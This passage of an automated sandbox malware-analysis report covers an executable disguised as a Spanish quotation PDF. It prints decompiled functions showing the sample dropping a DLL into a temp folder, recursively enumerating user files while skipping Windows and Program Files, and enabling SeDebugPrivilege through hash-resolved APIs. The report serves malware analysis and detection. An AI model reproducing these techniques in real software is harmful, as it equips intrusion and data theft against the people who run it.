Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024aa
0x00401561
0x00402825
0x00402880
0x0040288c

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F

Uniqueness

Uniqueness Score: -1.00%

Function 00403897, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405AA7(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x0040389b
0x004038a0
0x004038a6
0x004038ab
0x004038ab
0x004038b3
0x00000000
0x00000000
0x004038bb
0x004038c3
0x004038c5
0x004038cb
0x004038cb
0x004038cd
0x004038d9
0x00000000
0x00000000
0x004038dd
0x00000000
0x00000000
0x00000000
0x004038df
0x004038e4
0x004038ed
0x004038f3
0x004038f8
0x0040390c
0x00403917
0x0040392f
0x00403935
0x0040393a
0x00403942
0x00403963
0x00403963
0x00403963
0x00403944
0x00403946
0x00403946
0x0040394a
0x00403951
0x00403951
0x00403956
0x0040395c
0x0040395c
0x00000000
0x00403946
0x004038fa
0x004038ff
0x00403908
0x00403901
0x00403901
0x00403901
0x004038ff

APIs

SetWindowTextA.USER32(00000000,004236A0), ref: 0040392F

Strings

1033, xrefs: 0040389B, 004038A5, 00403916
C:\Users\user\AppData\Local\Temp\, xrefs: 00403898

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 530164218-2030658151
Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58

Uniqueness

Uniqueness Score: -1.00%

Function 00404D73, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}

0x00404d7f
0x00404da4
0x00404dc4
0x00404dc7
0x00404dca
0x00404de1
0x00404de7
0x00404dee
0x00404df5
0x00404dfc
0x00404e01
0x00404e07
0x00000000
0x00404e17
0x00404db1
0x00404e04
0x00404e04
0x00000000
0x00404e04
0x00404dbd
0x00404dbf
0x00000000
0x00404dbf
0x00404d85
0x00000000
0x00000000
0x00404d8c
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404DA9
CallWindowProcA.USER32 ref: 00404E17

Part of subcall function 00403E83: SendMessageA.USER32 ref: 00403E95

Strings

, xrefs: 00404D81

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004024B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f68 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nsc1150.tmp\tjbqk.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004024b0
0x004024b0
0x004024b3
0x004024ce
0x004024b5
0x004024b7
0x004024bc
0x004024c3
0x004024d5
0x0040264e
0x0040264e
0x004024db
0x004024ed
0x004015a6
0x004015a8
0x00000000
0x004015ae
0x004015a8
0x00402880
0x0040288c

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsc1150.tmp\tjbqk.dll,00000000,?,?,00000000,00000011), ref: 004024ED

Strings

C:\Users\user\AppData\Local\Temp\nsc1150.tmp\tjbqk.dll, xrefs: 004024BC, 004024E1

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsc1150.tmp\tjbqk.dll
API String ID: 427699356-4203197547
Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004055BF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x004055c0
0x004055ca
0x004055cc
0x004055d3
0x004055db
0x00000000
0x00000000
0x00000000
0x004055db
0x004055dd
0x004055e2

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe,C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe,80000000,00000003), ref: 004055C5
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe,C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe,80000000,00000003), ref: 004055D3

Strings

C:\Users\user\Desktop, xrefs: 004055BF

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9

Uniqueness

Uniqueness Score: -1.00%

Function 004056D1, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x004056dd
0x004056df
0x00405707
0x004056ec
0x004056f1
0x004056fc
0x00000000
0x00405719
0x00405705
0x00405705
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Cotizaci#U00f3npdf.exe PID: 2512 Parent PID: 2604 Cotizaci#U00f3npdf.exeCOMMON

Execution Graph

Execution Coverage:	31.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.3%
Total number of Nodes:	1846
Total number of Limit Nodes:	92

Executed Functions

Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}

0x00403d82
0x00403d88
0x00403d8c
0x00403d8d
0x00403d90
0x00403ea9
0x00403ea9
0x00403eb9
0x00403ebb
0x00403ec0
0x00403f95
0x00403f95
0x00000000
0x00403f95
0x00403ece
0x00403edb
0x00403edd
0x00403ee2
0x00403f8e
0x00403f8f
0x00000000
0x00403f94
0x00000000
0x00403ee8
0x00403ef8
0x00403f0a
0x00403f12
0x00403f18
0x00403f26
0x00403f28
0x00403f2d
0x00000000
0x00000000
0x00403f33
0x00403f76
0x00403f7c
0x00000000
0x00403f83
0x00403f36
0x00403f3a
0x00000000
0x00403f40
0x00403f0c
0x00403f10
0x00000000
0x00000000
0x00000000
0x00403f41
0x00403f41
0x00403f4b
0x00403f58
0x00403f5c
0x00403f88
0x00000000
0x00403f8d
0x00403f60
0x00000000
0x00403f60
0x00403ef8
0x00403ee8
0x00403da3
0x00403da9
0x00403ea6
0x00403ea8
0x00000000
0x00403ea8
0x00403db7
0x00403dc4
0x00403dc6
0x00403dcb
0x00403e9d
0x00403e9e
0x00403ea4
0x00000000
0x00000000
0x00000000
0x00000000
0x00403dd1
0x00403dd1
0x00403dd8
0x00000000
0x00000000
0x00403de2
0x00403e12
0x00403e22
0x00403e30
0x00403e36
0x00403e3f
0x00403e44
0x00403e47
0x00403e4a
0x00403e4c
0x00000000
0x00000000
0x00403e63
0x00403e65
0x00403e6a
0x00403e6f
0x00403f64
0x00403f6a
0x00000000
0x00403f71
0x00000000
0x00403e6f
0x00403e26
0x00403e27
0x00403e2e
0x00000000
0x00000000
0x00000000
0x00403e2e
0x00403dea
0x00403df9
0x00000000
0x00000000
0x00403e01
0x00403e10
0x00000000
0x00000000
0x00000000
0x00403e75
0x00403e7f
0x00403e8c
0x00403e8e
0x00403e97
0x00000000

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
%s\*, xrefs: 00403D99
Windows, xrefs: 00403DEA

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Uniqueness

Uniqueness Score: -1.00%

Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}

0x00406512
0x00406514
0x00406522
0x00406524
0x00406530
0x00406534
0x0040653f
0x0040654e
0x00406552
0x0040655a
0x0040655f
0x0040656d
0x00406570
0x00406573
0x0040657a
0x00406589
0x0040658d
0x00406590
0x00406594
0x00000000
0x0040659a
0x004065a1

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}

0x00402b8c
0x00402b92
0x00402b96
0x00402b9e
0x00402ba3
0x00402baa

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
